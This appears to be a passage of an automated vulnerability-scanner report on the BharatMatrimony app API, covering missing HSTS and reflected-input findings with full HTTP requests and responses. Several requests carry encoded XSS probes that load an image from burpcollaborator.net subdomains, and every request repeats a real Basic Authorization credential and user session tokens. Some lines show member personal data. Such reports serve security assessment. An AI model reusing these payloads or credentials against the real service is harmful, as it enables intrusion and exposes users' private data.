0~2~1~2~98~31~0~0~3116~3~2404~3~3~9~1~3~4~1~M~F~1589895554~~~~~~~~1~0~3~1~0~0~3~N~0~1~0~1~1~3~472~79~https://
m-
imgs.matrimonycdn.com/photos/2019/09/30/15/M6651646_IMXiF_4692_TL.jpg~1,12,16,26,23,21&LOGINGEN=M&DEVICEDET=&US
ERTIMEDET=1589902771&DOS=27&Lang=en&LOGINTYPE=F&MID=M6651646&ENCID=02ff975d1149526a01c1cfcf7f39321a8&TOKEN
ID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192&SDBMATRID=M6651646&STLIMIT=0&RECCNT=20&GE
NDER=M&INAPPIDS=M6257665,E5321603&CONTACTED=0&VIEWED=0&LOGINGEN=M&FROMINAPP=1&USERTIMEDET=1589902771
&SHORTLISTED=0&LOGINTYPE=F&STLIMIT=0&RECCNT=20 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 3301
Content-Type: application/json
Date: Tue, 19 May 2020 15:39:33 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRCODE":"0","TOTALRESULTS":"2","MATCHINGCOUNT":"2","REMAININGDAYS":"100","SEARCHRES":
{"PROFILE":[{"PROFILESTATUS":"0","MATRIID":"M6257665","NAME":"Vasutha","AGE":"24","GENDER":
...[SNIP]...
4. Strict transport security not enforced
Summary
Severity: Low
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /
Issue description
The application fails to prevent users from connecting to it over unencrypted connections. An attacker able to modify a
legitimate user's network traffic could bypass the application's use of SSL/TLS encryption, and use the application as a
platform for attacks against its users. This attack is performed by rewriting HTTPS links as HTTP, so that if a targeted user
follows a link to the site from an HTTP page, their browser never attempts to use an encrypted connection. The sslstrip tool
automates this process.
To exploit this vulnerability, an attacker must be suitably positioned to intercept and modify the victim's network traffic.
This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi,
or a corporate or home network that is shared with a compromised computer. Common defences such as switched
networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure
could also perform this attack. Note that an advanced adversary could potentially target any connection made over the
Internet's core infrastructure.
Issue remediation
The application should instruct web browsers to only access the application using HTTPS. To do this, enable HTTP Strict
Transport Security (HSTS) by adding a response header with the name 'Strict-Transport-Security' and the value
'max-age=expireTime', where expireTime is the time in seconds that browsers should remember that the site should only be
accessed using HTTPS. Consider adding the 'includeSubDomains' flag if appropriate.
Note that because HSTS is a "trust on first use" (TOFU) protocol, a user who has never accessed the application will never
have seen the HSTS header, and will therefore still be vulnerable to SSL stripping attacks. To mitigate this risk, you can
optionally add the 'preload' flag to the HSTS header, and submit the domain for review by browser vendors.
References
· HTTP Strict Transport Security
· sslstrip
· HSTS Preload Form
Vulnerability classifications
· CWE-523: Unprotected Transport of Credentials
5. Input returned in response (reflected)
Issue background
Reflection of input arises when data is copied from a request and echoed into the application's immediate response.
Input being returned in application responses is not a vulnerability in its own right. However, it is a prerequisite for many
client-side vulnerabilities, including cross-site scripting, open redirection, content spoofing, and response header injection.
Additionally, some server-side vulnerabilities such as SQL injection are often easier to identify and exploit when input is
returned in responses. In applications where input retrieval is rare and the environment is resistant to automated testing
(for example, due to a web application firewall), it might be worth subjecting instances of it to focused manual testing.
Vulnerability classifications
· CWE-20: Improper Input Validation
· CWE-116: Improper Encoding or Escaping of Output
5.1. https://apps.bharatmatrimony.com/apicommhistory/communicationhistory.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /apicommhistory/communicationhistory.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /apicommhistory/communicationhistory.php0pspdc49sf HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 179
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=02ff975d1149526a01c1cfcf7f39321a8&ID=M6651646&OUTPUTTY
PE=2&RECEIVERID=B2678847&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 247
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:12:49 GMT
Connection: close
5.2. https://apps.bharatmatrimony.com/apicommhistory/communicationhistory.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /apicommhistory/communicationhistory.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /apicommhistory/communicationhistory.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f1acewlgt459ws4ty5ut6iq4w0n6du5kteg64v%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 179
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=02ff975d1149526a01c1cfcf7f39321a8&ID=M6651646&OUTPUTTY
PE=2&RECEIVERID=B2678847&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 349
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:16:07 GMT
Connection: close
5.3. https://apps.bharatmatrimony.com/appassuredcontact/getphoneprivacy.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appassuredcontact/getphoneprivacy.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appassuredcontact/getphoneprivacy.phpn9mt2m82k4?SDBMATRID=M6651646 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 254
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&ENCID=02ff975d1149526a01c1cfcf7f39321a8&ENTRYTYPE=M&ID
=M6651646&IGNOREFLAG=1&LOGINGEN=M&Lang=en&OUTPUTTYPE=2&PRIVACYPAGE=PHOTO&SDBMATRID=M6651646&ST
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 245
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:26:46 GMT
Connection: close
5.4. https://apps.bharatmatrimony.com/appassuredcontact/getphoneprivacy.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appassuredcontact/getphoneprivacy.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appassuredcontact/getphoneprivacy.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fk6rxs4cc0o5fonph1dppe90fw62xqpgda02or%5c56burpcollaborator.net'%3e?SDBMATRID=M6651646 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 254
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&ENCID=02ff975d1149526a01c1cfcf7f39321a8&ENTRYTYPE=M&ID
=M6651646&IGNOREFLAG=1&LOGINGEN=M&Lang=en&OUTPUTTYPE=2&PRIVACYPAGE=PHOTO&SDBMATRID=M6651646&ST
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 347
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:43:30 GMT
Connection: close
5.5. https://apps.bharatmatrimony.com/appdaily6/yettobeviewed.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appdaily6/yettobeviewed.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appdaily6/yettobeviewed.phpwe5v73hy5d HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 174
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&DAILY6=1&ENCID=02ff975d1149526a01c1cfcf7f39321a8&MEMBERID=M6
651646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:12:53 GMT
Connection: close
5.6. https://apps.bharatmatrimony.com/appdaily6/yettobeviewed.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appdaily6/yettobeviewed.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appdaily6/yettobeviewed.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2flncy95tdhpmg5o6iie6qvahgd7jz7rxfr2jq8%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 174
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&DAILY6=1&ENCID=02ff975d1149526a01c1cfcf7f39321a8&MEMBERID=M6
651646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 337
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:15:51 GMT
Connection: close
5.7. https://apps.bharatmatrimony.com/appdynamicarray/appdynamicpopulate.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appdynamicarray/appdynamicpopulate.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appdynamicarray/appdynamicpopulate.phpgyh11l7k61 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 93
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2&REQTYPE=1-2-3-4-5-6-7-8-9-10-11-75
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 246
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:07:46 GMT
Connection: close
5.8. https://apps.bharatmatrimony.com/appdynamicarray/appdynamicpopulate.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appdynamicarray/appdynamicpopulate.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appdynamicarray/appdynamicpopulate.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f547iqpaxy930m8n2zynacuy0ur0koce08n0bp%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 93
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2&REQTYPE=1-2-3-4-5-6-7-8-9-10-11-75
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 348
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:12:50 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL
/appdynamicarray/appdynamicpopulate.php/'"><svg/onload=(new(Image)).src='//547iqpaxy930m8n2zynacuy0ur0koce08
n0bp\56burpcollaborator.net'> was not found on this server.</p>
...[SNIP]...
5.9. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appdynamicarray/appgetarrayversion.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appdynamicarray/28jsk7l01k HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 58
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 224
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:00:51 GMT
Connection: close
5.10. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appdynamicarray/appgetarrayversion.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appdynamicarray/appgetarrayversion.php/javascript%3a%2f*%3c%2fscript%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b
%2fonmouseover%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f%5c%2f7aikwrgz4b92sat450tciw420t6ougl4fr7fw
%5c.burpcollaborator.net%2f).replace(%2f%5c%5c%2fg%2c[]))%2f%2f'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 58
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 427
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:11:59 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appdynamicarray/appgetarrayversion.php/javascript:/*</script><svg/onload='+/"/
+/onmouseover=1/+/[*/[]/+((new(Image)).src=([]+/\/7aikwrgz4b92sat450tciw420t6ougl4fr7fw\.burpcollaborator.net/).replace(/\\/g,
[]))//'> was not found on this server.</p>
...[SNIP]...
5.11. https://apps.bharatmatrimony.com/appeditprofile/appeditprofile.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appeditprofile/appeditprofile.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appeditprofile/appeditprofile.phpz3hefiy4bv HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 175
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&EDITFORM=5&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&MATRIID=
M6651646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 241
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:11:20 GMT
Connection: close
5.12. https://apps.bharatmatrimony.com/appeditprofile/appeditprofile.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appeditprofile/appeditprofile.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appeditprofile/appeditprofile.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f2vyfhm1up6uxd5ezqve73rpxlorkfc50znrbg%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 175
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&EDITFORM=5&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&MATRIID=
M6651646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 343
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:14:40 GMT
Connection: close
5.13. https://apps.bharatmatrimony.com/appeditprofile/appownprofile.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appeditprofile/appownprofile.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appeditprofile/appownprofile.phpz0hjwo4iu8 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 249
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&DEVICEDET=&DOS=28&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&ID
=M6651646&Lang=en&OUTPUTTYPE=2&SDBMATRID=M6651646~192&TOKENID=131c6f8396a2071562a9b7c10e0bdf14
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:20:45 GMT
Connection: close
5.14. https://apps.bharatmatrimony.com/appeditprofile/appownprofile.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appeditprofile/appownprofile.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appeditprofile/appownprofile.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fybdbxihq52att1uv6ru3jn5t1k7hv9lxfk78w%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 249
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&DEVICEDET=&DOS=28&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&ID
=M6651646&Lang=en&OUTPUTTYPE=2&SDBMATRID=M6651646~192&TOKENID=131c6f8396a2071562a9b7c10e0bdf14
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 342
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:25:00 GMT
Connection: close
5.15. https://apps.bharatmatrimony.com/appei/appspromos.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appei/appspromos.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
GET /appei/appspromos.phpydbgaayrwb?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&
TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:13:26 GMT
Connection: close
5.16. https://apps.bharatmatrimony.com/appei/appspromos.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appei/appspromos.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
GET /appei/appspromos.php/javascript%3a%2f*%3c%2fscript%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b%2fonmouseover
%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f%5c%2f1qseclwtk5pw849ylu96yqkwgnmlad11vomcb
%5c.burpcollaborator.net%2f).replace(%2f%5c%5c%2fg%2c[]))%2f%2f'%3e?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&
TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 409
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:17:22 GMT
Connection: close
5.17. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/appgetcountryip.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /applogin/appgetcountryip.phpq487ybrymd HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 72
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2&SDBMATRID=104
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
Akamai-Age-Ms: 1589904157623
Date: Tue, 19 May 2020 16:02:37 GMT
Connection: close
5.18. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/appgetcountryip.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /applogin/appgetcountryip.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fowo1i82gqsvjerflrhft4dqjmas9g16p0cs0h%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 72
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2&SDBMATRID=104
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 338
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:12:03 GMT
Connection: close
5.19. https://apps.bharatmatrimony.com/applogin/getDeviceInfo.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/getDeviceInfo.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /applogin/65d1vunofq?SDBMATRID=M6651646 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 209
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=1e3edd6071d0eb091e7a25711511fe2a7&ENTRYTYPE=M&ID=M66
51646&LOGINGEN=M&OUTPUTTYPE=2&SDBMATRID=M6651646&START=0&TOKENID=131c6f8396a2071562a9b7c10e0bdf1
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 217
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:22:21 GMT
Connection: close
5.20. https://apps.bharatmatrimony.com/applogin/getDeviceInfo.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/getDeviceInfo.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
GET /applogin/getDeviceInfo.php/javascript%3a%2f*%3c%2fscript%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b%2fonmouseover
%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f%5c
%2f0kld6kqse4jv233xft35spevamge72ztnnaey3%5c.burpcollaborator.net%2f).replace(%2f%5c%5c%2fg%2c[]))%2f%2f'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 416
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:09:22 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
